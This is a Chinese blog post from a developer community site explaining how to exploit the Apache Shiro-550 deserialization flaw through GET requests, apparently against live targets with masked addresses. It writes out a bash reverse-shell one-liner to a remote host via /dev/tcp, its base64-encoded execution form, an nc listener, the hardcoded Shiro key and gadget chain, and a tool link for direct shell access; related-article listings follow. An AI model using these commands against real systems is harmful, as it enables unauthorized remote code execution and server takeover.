Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Shiro550-get型漏洞(验证+利用+反弹shell)

Shiro550-get型漏洞(验证+利用+反弹shell)

原创
作者头像
枪哥四海为家
修改于 2023-03-06 02:54:20
修改于 2023-03-06 02:54:20
1.2K00
代码可运行
举报
运行总次数:0
代码可运行

分享了Shiro550-POST型漏洞利用技巧,分享下get型实战技巧

常见条件

一般shiro550的get型隐患点不固定,如非登录口,伪静态页面可能都存在。简单经验归纳为靠近登录口的页面点和目标主站页面有可能存在

工具:飞鸿shiro检测v2.1

Shiro的利用不仅post数据包可以使用,get请求同样可以。使用界面工具可以看到返回特点:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
认证不成功(账号密码错误),返回包会返回deleteMe=
认证成功(账号密码错误),返回包会返回rememberMe=

Shiro漏洞点:http://XXX.XXX.XXX.XXX/r/sellerSign.html?storeType=1

Bash编码网站http://www.jackson-t.ca/runtime-exec-payloads.html

因为目标是linux系统,因此使用bash将其shell反弹过来:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash -i >& /dev/tcp/XXX.XXX.XXX.XXX/9999 0>&1

使用bash加密为

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash -c {echo,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=}|{base64,-d}|{bash,-i}

攻击机开启nc监听

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lvvp 9999    //端口进行监听

成功反弹shell

V2.2版本飞鸿工具直接getshell

https://github.com/feihong-cs/ShiroExploit/releases

某实战目标:

http://XXX.XXX.XXX.XXX:88/tenement/a/login

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
[*] Using Key kPH+bIxk5D2deZiIxcaaaA==
[*] Using Gadget CommonsBeanutils1

经过确认,这个实战目标Shell是通过反弹回不来的,需要通过带外攻击OOB截取返回包获取shell,下篇分享OOB

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
Shiro反序列化漏洞利用汇总
“ Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。”
Bypass
2020/07/07
10.9K0
Shiro反序列化漏洞利用汇总
Shiro550-post型漏洞(验证+利用+反弹shell)
当年比赛许多同学通过550拿下过各地核心目标和难打目标,自己参与其中无论从攻击还是防御溯源都受益匪浅
枪哥四海为家
2022/03/10
2.3K0
Shiro550-post型漏洞(验证+利用+反弹shell)
【漏洞复现】Apache Shiro 反序列化漏洞
shiro漏洞已经曝光很久了,一直没有整理思路与详细步骤,最近在学习java的反序列化,复现该漏洞来方便之后的学习
李鹏华
2024/03/12
1.9K0
【漏洞复现】Apache Shiro 反序列化漏洞
工具|Shiro漏洞一键检测利用工具ShiroExploit
支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持简单回显。 项目地址
Timeline Sec
2020/07/07
9.5K0
Shiro反序列化漏洞复现分析(Shiro-550)
Apache Shiro框架的记住密码功能,用户登录后生成加密编码的cookie。服务端对记住密码产生的cookie进行base64解密,再进行AES解密,之后进行反序列化,导致了反序列化漏洞。 服务端过程:cookie-->base64解密-->AES解密-->反序列化
R0A1NG
2022/02/19
2.1K0
Shiro反序列化漏洞复现分析(Shiro-550)
Apache Shiro反序列化漏洞-Shiro-550复现总结
最近一直在整理笔记,恰好碰到实习时遇到的Shiro反序列化漏洞,本着温故而知新的思想,就照着前辈们的文章好好研究了下,整理整理笔记并发个文章。新人初次投稿,文章有啥问题的话,还望各位大佬多多包含。
FB客服
2021/10/21
2.5K0
Log4j2 漏洞实战案例
在现在以及未来的一段时间里,Log4j2 漏洞依然是渗透和排查的重点。在测试靶场里复现多次,在实战中遇到还是十分兴奋,So,总得记录点什么吧。
Bypass
2022/04/19
1.1K0
Log4j2 漏洞实战案例
Apache Shiro (Shiro-550)远程代码执行-漏洞复现
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,
用户8478399
2022/09/22
1K0
Apache Shiro (Shiro-550)远程代码执行-漏洞复现
实习记录(二) - Shiro反序列化漏洞
背景:最近公司的师傅丢了个内网渗透的靶场让我们玩,需要通过对外映射的Web服务打进去。一开始看到是一个JeeCMS的站点,直接弱口令就进了后台。但是瞎搞一通都拿不到Shell。搜索了一番才知道原来方向错了,其实是一个Shiro反序列化的漏洞。 漏洞概述 Shiro使用 CookieRememberMeManager这个类对Cookie中的 remeberMe进行 序列化 => 使用密钥进行AES加密 => Base64编码,最后返回客户端 remebreme Cookie。在识别用户身份时需要对 remem
Naraku
2021/07/29
2.1K0
实习记录(二) - Shiro反序列化漏洞
Shiro-550反序列化漏洞复现
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
LuckySec
2022/11/02
1.7K0
Shiro-550反序列化漏洞复现
shiro_550反序列化复现.md
漏洞出现在cookie中的RememberMe字段中,说的简单通俗易懂些,当服务端获取到RememberMe后,会进行如下操作
sugarbeet
2022/09/26
2950
shiro_550反序列化复现.md
JAVA常见漏洞复现
Shiro550漏洞原理是Shiro框架提供了一种记住密码(Rememberme)的功能,用户登录成功后会生成经过加密的Cookie值,对Remembe的Cookie进行AES解密、Base64解密后再反序列化,就导致了反序列化RCE漏洞 。 Shiro<1.2.4版本,其使用的密钥为固定密钥Shiro550kPH+bIxk5D2deZiIxcaaaA==,这就更容易导致RCE漏洞
用户9691112
2023/05/18
1.8K0
JAVA常见漏洞复现
【漏洞实战】Apache Shiro反序列化远程代码执行复现及“批量杀鸡”
利用vmware workstation,安装一个操作系统,执行以下指令,更换系统源,并且安装docker
用户1631416
2019/12/19
3.1K1
【漏洞实战】Apache Shiro反序列化远程代码执行复现及“批量杀鸡”
工具分享 | shiro漏洞检测RCE工具
最近在做shiro反序列化漏洞复现,从网上也找了一堆复现文章和工具,但是这些工具用着都不太舒服,于是参考网上大佬们的工具,自己进行了一些简单的改良。
TeamsSix
2020/06/23
4.1K0
一次Shiro反序列化引起的域控沦陷
本文内容是笔者一次从0到1的实战记录,通过一次完整的外网到内网到拿下域控的过程,来为大家带来渗透的一些思路。
谢公子
2022/01/20
1K0
一次Shiro反序列化引起的域控沦陷
Shiro RememberMe 漏洞检测的探索之路
Shiro 是 Apache 旗下的一个用于权限管理的开源框架,提供开箱即用的身份验证、授权、密码套件和会话管理等功能。该框架在 2016 年报出了一个著名的漏洞——Shiro-550,即 RememberMe 反序列化漏洞。4年过去了,该漏洞不但没有沉没在漏洞的洪流中,反而凭借其天然过 WAF 的特性从去年开始逐渐升温,恐将在今年的 HW 演练中成为后起之秀。面对这样一个炙手可热的漏洞,这篇文章我们就来讲下,我是如何从 0 到 1 的将该漏洞的自动化检测做到极致的。
黑伞安全
2021/07/16
3.8K0
Shiro RememberMe 漏洞检测的探索之路
一文看懂shiro反序列化漏洞
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。
Gamma实验室
2020/12/23
2.5K0
一文看懂shiro反序列化漏洞
[漏洞复现]Apache Shiro 1.2.4反序列化
最近没怎么更新文章,不好意思啊,兄弟姐妹们。现在现实工作也忙。今天就更新一篇漏洞复现的吧,预计明天更新一个实战漏洞挖掘的文章(弱口令+越权)。你们如果想要什么工具,可以在公众号发消息我统一再处理上传。谢谢大家支持。(づ ̄ 3 ̄)づ
用户6343818
2019/11/19
6.2K1
攻防|红队外网打点实战案例分享
由于传播、利用本公众号亿人安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号亿人安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
亿人安全
2023/12/15
1K0
攻防|红队外网打点实战案例分享
框架安全之Shiro渗透复现
Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理,具有以下特点:
FB客服
2021/07/02
3.1K0
相关推荐
Shiro反序列化漏洞利用汇总
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验